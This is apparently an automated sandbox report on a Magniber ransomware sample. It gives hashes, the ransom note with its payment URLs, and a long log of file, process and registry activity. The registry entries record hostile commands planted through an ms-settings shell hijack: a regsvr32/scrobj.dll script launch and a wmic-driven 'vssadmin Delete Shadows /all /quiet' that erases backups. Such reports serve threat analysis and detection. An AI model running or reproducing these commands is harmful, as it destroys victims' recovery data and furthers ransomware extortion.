magniber | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Resubmissions

21/11/2021, 18:35

211121-w8k1bsecdq 10

21/11/2021, 18:15

211121-wvv85seccm 10

Analysis

max time kernel
151s
max time network
152s
platform
windows10_x64
resource
win10-en-20211104
submitted
21/11/2021, 18:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://f0340250eef46e10aaeltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://f0340250eef46e10aaeltalkfzj.jobsbig.cam/eltalkfzj http://f0340250eef46e10aaeltalkfzj.boxgas.icu/eltalkfzj http://f0340250eef46e10aaeltalkfzj.sixsees.club/eltalkfzj http://f0340250eef46e10aaeltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://f0340250eef46e10aaeltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://f0340250eef46e10aaeltalkfzj.jobsbig.cam/eltalkfzj

http://f0340250eef46e10aaeltalkfzj.boxgas.icu/eltalkfzj

http://f0340250eef46e10aaeltalkfzj.sixsees.club/eltalkfzj

http://f0340250eef46e10aaeltalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3136	2544	cmd.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1328	2544	cmd.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	716	2544	cmd.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3152	2544	cmd.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4204	2544	cmd.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4352	2544	cmd.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4372	2544	cmd.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4432	2544	cmd.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4460	2544	cmd.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4480	2544	cmd.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4604	2544	cmd.exe	95
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4668	2544	cmd.exe	95

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\ResumeConvertFrom.tif => C:\Users\Admin\Pictures\ResumeConvertFrom.tif.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\ExpandUnpublish.raw => C:\Users\Admin\Pictures\ExpandUnpublish.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\MeasureRedo.raw => C:\Users\Admin\Pictures\MeasureRedo.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\RepairExit.crw => C:\Users\Admin\Pictures\RepairExit.crw.eltalkfzj	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\CompressJoin.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\CompressJoin.tiff => C:\Users\Admin\Pictures\CompressJoin.tiff.eltalkfzj	sihost.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 2376 set thread context of 2400	2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	15
PID 2376 set thread context of 2448	2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	16
PID 2376 set thread context of 2728	2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	29
PID 2376 set thread context of 3016	2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	32
PID 2376 set thread context of 3472	2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	58
PID 2376 set thread context of 3672	2376	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	63

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3028	3672	WerFault.exe	63

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 7d02fdd103dfd701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedWidth = "800"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000c0e7e2ac82e74cf6beb5474115eadc648074fc3d3551b0b21f474db127c17c48f33e7b8e1d034a0d71015106b8223f42ff697b441b9196649126ca70fc425c1b675a1228b5cf9f2e0b3b8b62a394d44539b4efddb6d203db1f0336ba7bcdb0dc5a5b88283eed421713822bc5cddfb4315c73df9dafb44dcbb6fc481ca1008bd1e060a5e423fc95625af63b6eb5a32931a4c734efd7d71f36573389d16e7dc78da98b21cb859bd22a19b74144ab809e8ddfd05befbadb35d5f5c6417f35e2c9ba47fb942a5e6c63bd5de57546e31650f675af099a6161d99163d7cec4e8d0a95d09d06745590e105c30a08cb92805ec563d823c494f077b12d684839c41e85bb8002a89b5c32036107a087bf921edef3cb46a2f7d4d6e965471efc18edec8c7b9e6283e220244518ee53df8f05e6eefce61888bfcec36e556873677af721236faafec7a442e19f224f95f08484428af5237facf3e93ffcdd11c7b1c6e0a64984b7e95d738f43e77c2df8eac5a76bb7446f9e18e288a695f0684dceb3b935f37d75343762816557d07f9eaaafd88c6d500e65d5d1b1915ab944b326cab7ec354a7bd78ec1c3899	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000086408eb030753179284346173395bc2d2e6b2b4e448599dff5628fb8e3459d150f2995579bdb7813f6afdb7298565f5e01062c391d1eaaec0f2a	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 79f0e5fcadd1d701	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\ChildCapabilities\121 = 53002d0031002d00310035002d0033002d003100000053002d0031002d00310035002d0033002d003900000053002d0031002d00310035002d0033002d0033003200310035003400330030003800380034002d0031003300330039003800310036003200390032002d00380039003200350037003600310036002d003100310034003500380033003100300031003900000053002d0031002d00310035002d0033002d003700380037003400340038003200350034002d0031003200300037003900370032003800350038002d0033003500350038003600330033003600320032002d003100300035003900380038003600390036003400000053002d0031002d00310035002d0033002d0033003800340035003200370033003400360033002d0031003300330031003400320037003700300032002d0031003100380036003500350031003100390035002d003100310034003800310030003900390037003700000053002d0031002d00310035002d0033002d0031003000320034002d0031003000360035003300360035003900330036002d0031003200380031003600300034003700310036002d0033003500310031003700330038003400320038002d0031003600350034003700320031003600380037002d003400330032003700330034003400370039002d0033003200330032003100330035003800300036002d0034003000350033003200360034003100320032002d003300340035003600390033003400360038003100000053002d0031002d00310035002d0033002d0031003000320034002d0033003600320033003800350035003000340031002d0031003800320036003900390039003900350036002d0033003700340037003000360039003800310038002d0033003500320035003200360030003200320033002d0033003700340037003300370034003500310030002d0031003700340036003200370032003600320034002d003900350030003600300031003100360038002d0035003600350035003600330033003100000053002d0031002d00310035002d0033002d0031003000320034002d0032003400300035003400340033003400380039002d003800370034003000330036003100320032002d0034003200380036003000330035003500350035002d0031003800320033003900320031003500360035002d0031003700340036003500340037003400330031002d0032003400350033003800380035003400340038002d0033003600320035003900350032003900300032002d00390039003100360033003100320035003600000053002d0031002d00310035002d0033002d0031003000320034002d0031003500300032003800320035003100360036002d0031003900360033003700300038003300340035002d0032003600310036003300370037003400360031002d0032003500360032003800390037003000370034002d0034003100390032003000320038003300370032002d0033003900360038003300300031003500370030002d0031003900390037003600320038003600390032002d003100340033003500390035003300360032003200000053002d0031002d00310035002d0033002d0031003000320034002d0033003200300033003300350031003400320039002d0032003100320030003400340033003700380034002d0032003800370032003600370030003700390037002d0031003900310038003900350038003300300032002d0032003800320039003000350035003600340037002d0034003200370035003700390034003500310039002d003700360035003600360034003400310034002d003200370035003100370037003300330033003400000053002d0031002d00310035002d0033002d0031003000320034002d0031003700380038003100320039003300300033002d0032003100380033003200300038003500370037002d0033003900390039003400370034003200370032002d0033003100340037003300350039003900380035002d0031003700350037003300320032003100390033002d0033003800310035003700350036003300380036002d003100350031003500380032003100380030002d003100380038003800310030003100310039003300000053002d0031002d00310035002d0033002d0031003000320034002d0033003100350033003500300039003600310033002d003900360030003600360036003700360037002d0033003700320034003600310031003100330035002d0032003700320035003600360032003600340030002d00310032003100330038003200350033002d003500340033003900310030003200320037002d0031003900350030003400310034003600330035002d003400310039003000320039003000310038003700000053002d0031002d00310035002d0033002d0031003000320034002d003100320036003000370038003500390033002d0033003600350038003600380036003700320038002d0031003900380034003800380033003300300036002d003800320031003300390039003600390036002d0033003600380034003000370039003900360030002d003500360034003000330038003600380030002d0033003400310034003800380030003000390038002d003300340033003500380032003500320030003100000053002d0031002d00310035002d0033002d0031003000320034002d0031003600390032003900370030003100350035002d0034003000350034003800390033003300330035002d003100380035003700310034003000390031002d0033003300360032003600300031003900340033002d0033003500320036003500390033003100380031002d0031003100350039003800310036003900380034002d0032003100390039003000300038003500380031002d00340039003700340039003200390039003100000053002d0031002d00310035002d0033002d0031003000320034002d003200320030003000320032003700370030002d003700300031003200360031003900380034002d0033003900390031003200390032003900350036002d0034003200300038003700350031003000320030002d0032003900310038003200390033003000350038002d0033003300390036003400310039003300330031002d0031003700300030003900330032003300340038002d003200300037003800330036003400380039003100000053002d0031002d00310035002d0033002d0031003000320034002d003500320038003100310038003900360036002d0033003800370036003800370034003300390038002d003700300039003500310033003500370031002d0031003900300037003800370033003000380034002d0033003500390038003200320037003600330034002d0033003600390038003700330030003000360030002d003200370038003000370037003700380038002d0033